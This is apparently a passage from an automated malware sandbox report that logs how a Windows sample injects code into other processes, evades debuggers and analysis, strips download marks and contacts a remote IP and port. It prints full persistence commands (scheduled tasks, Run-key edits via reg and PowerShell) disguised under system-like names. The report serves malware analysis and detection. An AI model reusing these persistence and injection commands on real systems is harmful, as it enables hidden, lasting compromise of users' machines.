NtAllocateVirtualMemory Aug. 18, 2022, 5:28 p.m.	process_identifier: 2324 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x006c8000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1	0
NtAllocateVirtualMemory Aug. 18, 2022, 5:28 p.m.	process_identifier: 2324 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x006c9000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1	0
NtAllocateVirtualMemory Aug. 18, 2022, 5:28 p.m.	process_identifier: 2324 region_size: 8192 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x006ca000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1	0
NtAllocateVirtualMemory Aug. 18, 2022, 5:28 p.m.	process_identifier: 2324 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x006cc000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1	0
NtAllocateVirtualMemory Aug. 18, 2022, 5:28 p.m.	process_identifier: 2324 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x006cd000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1	0
NtAllocateVirtualMemory Aug. 18, 2022, 5:28 p.m.	process_identifier: 2324 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x006ce000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1	0
NtAllocateVirtualMemory Aug. 18, 2022, 5:28 p.m.	process_identifier: 2324 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00771000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1	0
NtAllocateVirtualMemory Aug. 18, 2022, 5:28 p.m.	process_identifier: 2324 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x006cf000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1	0
NtAllocateVirtualMemory Aug. 18, 2022, 5:28 p.m.	process_identifier: 2324 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05a30000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1	0
NtAllocateVirtualMemory Aug. 18, 2022, 5:28 p.m.	process_identifier: 2324 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05a31000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1	0
NtAllocateVirtualMemory Aug. 18, 2022, 5:28 p.m.	process_identifier: 2324 region_size: 8192 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05a32000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1	0
NtAllocateVirtualMemory Aug. 18, 2022, 5:28 p.m.	process_identifier: 2324 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05a34000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1	0
NtAllocateVirtualMemory Aug. 18, 2022, 5:28 p.m.	process_identifier: 2324 region_size: 8192 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05a35000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1	0
NtAllocateVirtualMemory Aug. 18, 2022, 5:28 p.m.	process_identifier: 2324 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05a37000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1	0
NtAllocateVirtualMemory Aug. 18, 2022, 5:28 p.m.	process_identifier: 2324 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05a38000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1	0
NtAllocateVirtualMemory Aug. 18, 2022, 5:28 p.m.	process_identifier: 2324 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05a39000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1	0
NtAllocateVirtualMemory Aug. 18, 2022, 5:28 p.m.	process_identifier: 2324 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05a3a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1	0
NtAllocateVirtualMemory Aug. 18, 2022, 5:28 p.m.	process_identifier: 2324 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05a3b000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1	0
NtAllocateVirtualMemory Aug. 18, 2022, 5:28 p.m.	process_identifier: 2324 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05a3c000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1	0
NtAllocateVirtualMemory Aug. 18, 2022, 5:28 p.m.	process_identifier: 2324 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05a3d000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1	0
NtAllocateVirtualMemory Aug. 18, 2022, 5:28 p.m.	process_identifier: 2324 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05a3e000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1	0
NtProtectVirtualMemory Aug. 18, 2022, 5:28 p.m.	process_identifier: 2324 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 36352 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x059b0400 process_handle: 0xffffffff		3221225550
NtAllocateVirtualMemory Aug. 18, 2022, 5:28 p.m.	process_identifier: 2324 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05a3f000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1	0

Creates executable files on the filesystem (6 events)

file	C:\Roamiing\dataencod.exe
file	C:\Roamiing\msiexec2.exe
file	C:\Roamiing\SecurityHealthService.exe
file	C:\Users\test22\AppData\Local\Temp\tmp31AA.tmp.exe
file	C:\Roamiing\WindowsSystemGuardRuntime.exe
file	C:\Users\test22\AppData\Roaming\Windows System Guard Runtime\Windows System Guard Runtime.exe

Creates a shortcut to an executable file (1 event)

file	C:\Users\test22\AppData\Local\Temp\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk

Creates a suspicious process (3 events)

cmdline	schtasks /create /tn \Windows System Guard Runtime /tr "C:\Users\test22\AppData\Roaming\Windows System Guard Runtime\Windows System Guard Runtime.exe" /st 00:00 /du 9999:59 /sc once /ri 60 /rl HIGHEST /f
cmdline	"cmd" /C schtasks /create /tn \Windows System Guard Runtime /tr "C:\Users\test22\AppData\Roaming\Windows System Guard Runtime\Windows System Guard Runtime.exe" /st 00:00 /du 9999:59 /sc once /ri 60 /rl HIGHEST /f
cmdline	"powershell.exe" Remove -ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'Windows System Guard Runtime';New-ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'Windows System Guard Runtime' -Value '"C:\Users\test22\AppData\Roaming\Windows System Guard Runtime\Windows System Guard Runtime.exe"' -PropertyType 'String'

Drops a binary and executes it (5 events)

file	C:\Roamiing\WindowsSystemGuardRuntime.exe
file	C:\Roamiing\SecurityHealthService.exe
file	C:\Roamiing\dataencod.exe
file	C:\Roamiing\msiexec2.exe
file	C:\Users\test22\AppData\Local\Temp\tmp31AA.tmp.exe

Drops an executable to the user AppData folder (1 event)

file	C:\Users\test22\AppData\Local\Temp\tmp31AA.tmp.exe

A process created a hidden window (4 events)

Time & API	Arguments	Status	Return
CreateProcessInternalW Aug. 18, 2022, 5:28 p.m.	thread_identifier: 2716 thread_handle: 0x000001b4 process_identifier: 2712 current_directory: C:\Users\test22\AppData\Local\Temp filepath: track: 1 command_line: "powershell.exe" Remove -ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'Windows System Guard Runtime';New-ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'Windows System Guard Runtime' -Value '"C:\Users\test22\AppData\Roaming\Windows System Guard Runtime\Windows System Guard Runtime.exe"' -PropertyType 'String' filepath_r: stack_pivoted: 0 creation_flags: 134217728 (CREATE_NO_WINDOW) inherit_handles: 1 process_handle: 0x000001ac	1	1
CreateProcessInternalW Aug. 18, 2022, 5:28 p.m.	thread_identifier: 2784 thread_handle: 0x00000218 process_identifier: 2780 current_directory: C:\Users\test22\AppData\Local\Temp filepath: track: 1 command_line: "cmd" /C schtasks /create /tn \Windows System Guard Runtime /tr "C:\Users\test22\AppData\Roaming\Windows System Guard Runtime\Windows System Guard Runtime.exe" /st 00:00 /du 9999:59 /sc once /ri 60 /rl HIGHEST /f filepath_r: stack_pivoted: 0 creation_flags: 134217728 (CREATE_NO_WINDOW) inherit_handles: 1 process_handle: 0x0000022c	1	1
CreateProcessInternalW Aug. 18, 2022, 5:28 p.m.	thread_identifier: 2140 thread_handle: 0x00000614 process_identifier: 1176 current_directory: C:\Users\test22\AppData\Local\Temp filepath: track: 1 command_line: "cmd" /c ping 127.0.0.1 -n 37 > nul && REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /f /v "Runtime Brookeer" /t REG_SZ /d "C:\Users\test22\Music\\Videos\Runtime Brookeer.exe" filepath_r: stack_pivoted: 0 creation_flags: 134217728 (CREATE_NO_WINDOW) inherit_handles: 1 process_handle: 0x00000620	1	1
CreateProcessInternalW Aug. 18, 2022, 5:28 p.m.	thread_identifier: 3024 thread_handle: 0x00000218 process_identifier: 3012 current_directory: C:\Users\test22\AppData\Local\Temp filepath: track: 1 command_line: "cmd" /c ping 127.0.0.1 -n 47 > nul && copy "C:\Roamiing\dataencod.exe" "C:\Users\test22\Music\\Videos\Runtime Brookeer.exe" && ping 127.0.0.1 -n 47 > nul && "C:\Users\test22\Music\\Videos\Runtime Brookeer.exe" filepath_r: stack_pivoted: 0 creation_flags: 134217728 (CREATE_NO_WINDOW) inherit_handles: 1 process_handle: 0x0000020c	1	1

Checks adapter addresses which can be used to detect virtual network interfaces (1 event)

Time & API	Arguments	Status	Return	Repeated
GetAdaptersAddresses Aug. 18, 2022, 5:28 p.m.	flags: 15 family: 0		111	0

Checks for the Locally Unique Identifier on the system for a suspicious privilege (4 events)

Time & API	Arguments	Status	Return
LookupPrivilegeValueW Aug. 18, 2022, 5:28 p.m.	system_name: privilege_name: SeDebugPrivilege	1	1
LookupPrivilegeValueW Aug. 18, 2022, 5:28 p.m.	system_name: privilege_name: SeDebugPrivilege	1	1
LookupPrivilegeValueW Aug. 18, 2022, 5:28 p.m.	system_name: privilege_name: SeDebugPrivilege	1	1
LookupPrivilegeValueW Aug. 18, 2022, 5:28 p.m.	system_name: privilege_name: SeDebugPrivilege	1	1

Yara rule detected in process memory (17 events)

description	(no description)	rule	DebuggerCheck__GlobalFlags
description	(no description)	rule	DebuggerCheck__QueryInfo
description	(no description)	rule	DebuggerHiding__Thread
description	(no description)	rule	DebuggerHiding__Active
description	(no description)	rule	ThreadControl__Context
description	(no description)	rule	SEH__vectored
description	Bypass DEP	rule	disable_dep
description	task schedule	rule	schtasks_Zero
description	(no description)	rule	DebuggerCheck__GlobalFlags
description	(no description)	rule	DebuggerCheck__QueryInfo
description	(no description)	rule	DebuggerCheck__RemoteAPI
description	(no description)	rule	DebuggerHiding__Thread
description	(no description)	rule	DebuggerHiding__Active
description	(no description)	rule	ThreadControl__Context
description	(no description)	rule	SEH__vectored
description	Checks if being debugged	rule	anti_dbg
description	Bypass DEP	rule	disable_dep

Terminates another process (2 events)

Time & API	Arguments	Status	Return	Repeated
NtTerminateProcess Aug. 18, 2022, 5:28 p.m.	status_code: 0xffffffff process_identifier: 2856 process_handle: 0x00000248		0	0
NtTerminateProcess Aug. 18, 2022, 5:28 p.m.	status_code: 0xffffffff process_identifier: 2856 process_handle: 0x00000248	1	0	0

Uses Windows utilities for basic Windows functionality (7 events)

cmdline	"cmd" /c ping 127.0.0.1 -n 37 > nul && REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /f /v "Runtime Brookeer" /t REG_SZ /d "C:\Users\test22\Music\\Videos\Runtime Brookeer.exe"
cmdline	schtasks /create /tn \Windows System Guard Runtime /tr "C:\Users\test22\AppData\Roaming\Windows System Guard Runtime\Windows System Guard Runtime.exe" /st 00:00 /du 9999:59 /sc once /ri 60 /rl HIGHEST /f
cmdline	ping 127.0.0.1 -n 37
cmdline	"cmd" /C schtasks /create /tn \Windows System Guard Runtime /tr "C:\Users\test22\AppData\Roaming\Windows System Guard Runtime\Windows System Guard Runtime.exe" /st 00:00 /du 9999:59 /sc once /ri 60 /rl HIGHEST /f
cmdline	ping 127.0.0.1 -n 47
cmdline	"cmd" /c ping 127.0.0.1 -n 47 > nul && copy "C:\Roamiing\dataencod.exe" "C:\Users\test22\Music\\Videos\Runtime Brookeer.exe" && ping 127.0.0.1 -n 47 > nul && "C:\Users\test22\Music\\Videos\Runtime Brookeer.exe"
cmdline	REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /f /v "Runtime Brookeer" /t REG_SZ /d "C:\Users\test22\Music\\Videos\Runtime Brookeer.exe"

Communicates with host for which no DNS query was performed (1 event)

host

217.64.31.3

Allocates execute permission to another process indicative of possible code injection (3 events)

Time & API	Arguments	Status	Return
NtAllocateVirtualMemory Aug. 18, 2022, 5:28 p.m.	process_identifier: 2840 region_size: 344064 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00400000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x00000778	1	0
NtAllocateVirtualMemory Aug. 18, 2022, 5:28 p.m.	process_identifier: 2856 region_size: 73728 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00400000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x00000240		3221225496
NtAllocateVirtualMemory Aug. 18, 2022, 5:28 p.m.	process_identifier: 2920 region_size: 73728 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00400000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x0000024c	1	0

Looks for the Windows Idle Time to determine the uptime (1 event)

Time & API	Arguments	Status	Return	Repeated
NtQuerySystemInformation Aug. 18, 2022, 5:28 p.m.	information_class: 8 (SystemProcessorPerformanceInformation)	1	0	0

A process attempted to delay the analysis task. (2 events)

description	final00.exe tried to sleep 2728276 seconds, actually delayed analysis time by 2728276 seconds
description	dataencod.exe tried to sleep 5456419 seconds, actually delayed analysis time by 5456419 seconds

Installs itself for autorun at Windows startup (4 events)

reg_key	HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\Windows System Guard Runtime	reg_value	C:\Users\test22\AppData\Roaming\Windows System Guard Runtime\Windows System Guard Runtime.exe
reg_key	HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\Runtime Brookeer	reg_value	C:\Users\test22\Music\\Videos\Runtime Brookeer.exe
cmdline	schtasks /create /tn \Windows System Guard Runtime /tr "C:\Users\test22\AppData\Roaming\Windows System Guard Runtime\Windows System Guard Runtime.exe" /st 00:00 /du 9999:59 /sc once /ri 60 /rl HIGHEST /f
cmdline	"cmd" /C schtasks /create /tn \Windows System Guard Runtime /tr "C:\Users\test22\AppData\Roaming\Windows System Guard Runtime\Windows System Guard Runtime.exe" /st 00:00 /du 9999:59 /sc once /ri 60 /rl HIGHEST /f

Manipulates memory of a non-child process indicative of process injection (4 events)

Time & API	Arguments	Status	Return	Repeated
Process injection	Process 2512 manipulating memory of non-child process 2856
Process injection	Process 2512 manipulating memory of non-child process 2920
NtAllocateVirtualMemory Aug. 18, 2022, 5:28 p.m.	process_identifier: 2856 region_size: 73728 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00400000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x00000240		3221225496	0
NtAllocateVirtualMemory Aug. 18, 2022, 5:28 p.m.	process_identifier: 2920 region_size: 73728 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00400000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x0000024c	1	0	0

Potential code injection by writing to the memory of another process (8 events)

Time & API	Arguments	Status	Return	Repeated
Process injection	Process 2512 injected into non-child 2920
WriteProcessMemory Aug. 18, 2022, 5:28 p.m.	buffer: MZÿÿ¸@º´ Í!¸LÍ!This program cannot be run in DOS mode. $PEL`Æbà0Ü®û @ @``ûK H.text´Û Ü `.rsrcÞ@@.reloc ö@B base_address: 0x00400000 process_identifier: 2840 process_handle: 0x00000778	1	1	0
WriteProcessMemory Aug. 18, 2022, 5:28 p.m.	buffer: ð°; base_address: 0x00452000 process_identifier: 2840 process_handle: 0x00000778	1	1	0
WriteProcessMemory Aug. 18, 2022, 5:28 p.m.	buffer: @ base_address: 0x7efde008 process_identifier: 2840 process_handle: 0x00000778	1	1	0
WriteProcessMemory Aug. 18, 2022, 5:28 p.m.	buffer: MZÿÿ¸@º´ Í!¸LÍ!This program cannot be run in DOS mode. $PEL#·^à²^Ð à@ @ÐSà H.textd° ² `.rsrc à ´@@.reloc¾@B base_address: 0x00400000 process_identifier: 2920 process_handle: 0x0000024c	1	1	0
WriteProcessMemory Aug. 18, 2022, 5:28 p.m.	buffer: 8Ph àìäääì4VS_VERSION_INFO½ïþæaJæaJ?DVarFileInfo$Translation°JStringFileInfo&000004b0CommentsLCompanyNameMicrosoft CorporationRFileDescriptioniSCSI Discovery tool>FileVersion6.2.19041.17662 InternalNameiscsicli.LegalCopyright© Microsoft Corporation. All rights reserved.*LegalTrademarks: OriginalFilenameiscsiclij%ProductNameMicrosoft® Windows® Operating SystemBProductVersion6.2.19041.1766FAssembly Version6.2.19041.1766ï»¿<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0"> <trustInfo xmlns="urn:schemas-microsoft-com:asm.v2"> <security> <requestedPrivileges> <requestedExecutionLevel level="asInvoker" uiAccess="false" /> </requestedPrivileges> </security> </trustInfo> <compatibility xmlns="urn:schemas-microsoft-com:compatibility.v1"> <application> <!-- Windows Vista --> <supportedOS Id="{e2011457-1546-43c5-a5fe-008deee3d3f0}"/> <!-- Windows 7 --> <supportedOS Id="{35138b9a-5d96-4fbd-8e2d-a2440225f93a}"/> <!-- Windows 8 --> <supportedOS Id="{4a2f28e3-53b9-4441-ba9c-d69d4a4a6e38}"/> <!-- Windows 8.1 --> <supportedOS Id="{1f676c76-80e1-4239-95bb-83d0f6d0da78}"/> <!-- Windows 10 --> <supportedOS Id="{8e0f7a12-bfb3-4fe8-b9a5-48fd50a15a9a}"/> </application> </compatibility> <asmv3:application xmlns:asmv3="urn:schemas-microsoft-com:asm.v3" > <asmv3:windowsSettings xmlns="http://schemas.microsoft.com/SMI/2005/WindowsSettings"> <dpiAware>true</dpiAware> </asmv3:windowsSettings> </asmv3:application> </assembly>PPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDING base_address: 0x0040e000 process_identifier: 2920 process_handle: 0x0000024c	1	1	0
WriteProcessMemory Aug. 18, 2022, 5:28 p.m.	buffer: Ð`0 base_address: 0x00410000 process_identifier: 2920 process_handle: 0x0000024c	1	1	0
WriteProcessMemory Aug. 18, 2022, 5:28 p.m.	buffer: @ base_address: 0x7efde008 process_identifier: 2920 process_handle: 0x0000024c	1	1	0

Code injection by writing an executable or DLL to the memory of another process (3 events)

Time & API	Arguments	Status	Return	Repeated
Process injection	Process 2512 injected into non-child 2920
WriteProcessMemory Aug. 18, 2022, 5:28 p.m.	buffer: MZÿÿ¸@º´ Í!¸LÍ!This program cannot be run in DOS mode. $PEL`Æbà0Ü®û @ @``ûK H.text´Û Ü `.rsrcÞ@@.reloc ö@B base_address: 0x00400000 process_identifier: 2840 process_handle: 0x00000778	1	1	0
WriteProcessMemory Aug. 18, 2022, 5:28 p.m.	buffer: MZÿÿ¸@º´ Í!¸LÍ!This program cannot be run in DOS mode. $PEL#·^à²^Ð à@ @ÐSà H.textd° ² `.rsrc à ´@@.reloc¾@B base_address: 0x00400000 process_identifier: 2920 process_handle: 0x0000024c	1	1	0

Used NtSetContextThread to modify a thread in a remote process indicative of process injection (4 events)

Time & API	Arguments	Status	Return	Repeated
Process injection	Process 2324 called NtSetContextThread to modify thread in remote process 2840
Process injection	Process 2512 called NtSetContextThread to modify thread in remote process 2920
NtSetContextThread Aug. 18, 2022, 5:28 p.m.	registers.eip: 0 registers.esp: 0 registers.edi: 0 registers.eax: 4520878 registers.ebp: 0 registers.edx: 0 registers.ebx: 2130567168 registers.esi: 0 registers.ecx: 0 thread_handle: 0x00000774 process_identifier: 2840	1	0	0
NtSetContextThread Aug. 18, 2022, 5:28 p.m.	registers.eip: 0 registers.esp: 0 registers.edi: 0 registers.eax: 4247646 registers.ebp: 0 registers.edx: 0 registers.ebx: 2130567168 registers.esi: 0 registers.ecx: 0 thread_handle: 0x00000248 process_identifier: 2920	1	0	0

Powershell script adds registry entries (1 event)

cmd

"cmd" /c ping 127.0.0.1 -n 37 > nul && reg add "hkcu\software\microsoft\windows\currentversion\run" /f /v "runtime brookeer" /t reg_sz /d "c:\users\test22\music\\videos\runtime brookeer.exe"\roamiing\securityhealthservice.exe"c:\roamiing\windowssystemguardruntime.exe" "c:\roamiing\dataencod.exe" schtasks /create /tn \windows system guard runtime /tr "c:\users\test22\appdata\roaming\windows system guard runtime\windows system guard runtime.exe" /st 00:00 /du 9999:59 /sc once /ri 60 /rl highest /fc:\users\test22\appdata\local\temp\tmp31aa.tmp.exeping 127.0.0.1 -n 37 \roamiing\msiexec2.exe"c:\windows\microsoft.net\framework\v4.0.30319\installutil.exe""cmd" /c schtasks /create /tn \windows system guard runtime /tr "c:\users\test22\appdata\roaming\windows system guard runtime\windows system guard runtime.exe" /st 00:00 /du 9999:59 /sc once /ri 60 /rl highest /f"c:\roamiing\msiexec2.exe" ping 127.0.0.1 -n 47 "cmd" /c ping 127.0.0.1 -n 47 > nul && copy "c:\roamiing\dataencod.exe" "c:\users\test22\music\\videos\runtime brookeer.exe" && ping 127.0.0.1 -n 47 > nul && "c:\users\test22\music\\videos\runtime brookeer.exe""c:\roamiing\securityhealthservice.exe" \roamiing\dataencod.exe#cmd"powershell.exe" remove -itemproperty -path 'hkcu:\software\microsoft\windows\currentversion\run' -name 'windows system guard runtime';new-itemproperty -path 'hkcu:\software\microsoft\windows\currentversion\run' -name 'windows system guard runtime' -value '"c:\users\test22\appdata\roaming\windows system guard runtime\windows system guard runtime.exe"' -propertytype 'string'\roamiing\windowssystemguardruntime.exereg add "hkcu\software\microsoft\windows\currentversion\run" /f /v "runtime brookeer" /t reg_sz /d "c:\users\test22\music\\videos\runtime brookeer.exe""c:\users\test22\appdata\local\temp\tmp31aa.tmp.exe"

Attempts to remove evidence of file being downloaded from the Internet (2 events)

file	C:\Users\test22\AppData\Local\Temp\final00.exe\:Zone.Identifier
file	C:\Roamiing\dataencod.exe\:Zone.Identifier

Resumed a suspended thread in a remote process potentially indicative of process injection (4 events)

Time & API	Arguments	Status	Return	Repeated
Process injection	Process 2324 resumed a thread in remote process 2840
Process injection	Process 2512 resumed a thread in remote process 2920
NtResumeThread Aug. 18, 2022, 5:28 p.m.	thread_handle: 0x00000774 suspend_count: 1 process_identifier: 2840	1	0	0
NtResumeThread Aug. 18, 2022, 5:28 p.m.	thread_handle: 0x00000248 suspend_count: 1 process_identifier: 2920	1	0	0

Uses Sysinternals tools in order to add additional command line functionality (2 events)

cmdline	schtasks /create /tn \Windows System Guard Runtime /tr "C:\Users\test22\AppData\Roaming\Windows System Guard Runtime\Windows System Guard Runtime.exe" /st 00:00 /du 9999:59 /sc once /ri 60 /rl HIGHEST /f
cmdline	"cmd" /C schtasks /create /tn \Windows System Guard Runtime /tr "C:\Users\test22\AppData\Roaming\Windows System Guard Runtime\Windows System Guard Runtime.exe" /st 00:00 /du 9999:59 /sc once /ri 60 /rl HIGHEST /f

Connects to an IP address that is no longer responding to requests (legitimate services will remain up-and-running usually) (1 event)

dead_host

217.64.31.3:8437

Executed a process and injected code into it, probably while unpacking (50 out of 93 events)

Time & API	Arguments	Status	Return
NtResumeThread Aug. 18, 2022, 5:28 p.m.	thread_handle: 0x000000e0 suspend_count: 1 process_identifier: 2324	1	0
NtResumeThread Aug. 18, 2022, 5:28 p.m.	thread_handle: 0x00000150 suspend_count: 1 process_identifier: 2324	1	0
NtResumeThread Aug. 18, 2022, 5:28 p.m.	thread_handle: 0x00000190 suspend_count: 1 process_identifier: 2324	1	0
NtResumeThread Aug. 18, 2022, 5:28 p.m.	thread_handle: 0x0000034c suspend_count: 1 process_identifier: 2324	1	0
NtResumeThread Aug. 18, 2022, 5:28 p.m.	thread_handle: 0x000005dc suspend_count: 1 process_identifier: 2324	1	0
NtResumeThread Aug. 18, 2022, 5:28 p.m.	thread_handle: 0x000005f0 suspend_count: 1 process_identifier: 2324	1	0
NtResumeThread Aug. 18, 2022, 5:28 p.m.	thread_handle: 0x00000220 suspend_count: 1 process_identifier: 2324	1	0
NtGetContextThread Aug. 18, 2022, 5:28 p.m.	thread_handle: 0x000000e4	1	0
NtGetContextThread Aug. 18, 2022, 5:28 p.m.	thread_handle: 0x000000e4	1	0
NtResumeThread Aug. 18, 2022, 5:28 p.m.	thread_handle: 0x000000e4 suspend_count: 1 process_identifier: 2324	1	0
NtResumeThread Aug. 18, 2022, 5:28 p.m.	thread_handle: 0x0000023c suspend_count: 1 process_identifier: 2324	1	0
NtResumeThread Aug. 18, 2022, 5:28 p.m.	thread_handle: 0x00000334 suspend_count: 1 process_identifier: 2324	1	0
NtGetContextThread Aug. 18, 2022, 5:28 p.m.	thread_handle: 0x000000e4	1	0
NtGetContextThread Aug. 18, 2022, 5:28 p.m.	thread_handle: 0x000000e4	1	0
NtResumeThread Aug. 18, 2022, 5:28 p.m.	thread_handle: 0x000000e4 suspend_count: 1 process_identifier: 2324	1	0
CreateProcessInternalW Aug. 18, 2022, 5:28 p.m.	thread_identifier: 2516 thread_handle: 0x0000072c process_identifier: 2512 current_directory: C:\Users\test22\AppData\Local\Temp filepath: C:\Roamiing\WindowsSystemGuardRuntime.exe track: 1 command_line: "C:\Roamiing\WindowsSystemGuardRuntime.exe" filepath_r: C:\Roamiing\WindowsSystemGuardRuntime.exe stack_pivoted: 0 creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE\|CREATE_NEW_CONSOLE\|CREATE_UNICODE_ENVIRONMENT\|EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 0 process_handle: 0x00000734	1	1
CreateProcessInternalW Aug. 18, 2022, 5:28 p.m.	thread_identifier: 2556 thread_handle: 0x000006d0 process_identifier: 2552 current_directory: C:\Users\test22\AppData\Local\Temp filepath: C:\Roamiing\SecurityHealthService.exe track: 1 command_line: "C:\Roamiing\SecurityHealthService.exe" filepath_r: C:\Roamiing\SecurityHealthService.exe stack_pivoted: 0 creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE\|CREATE_NEW_CONSOLE\|CREATE_UNICODE_ENVIRONMENT\|EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 0 process_handle: 0x00000738	1	1
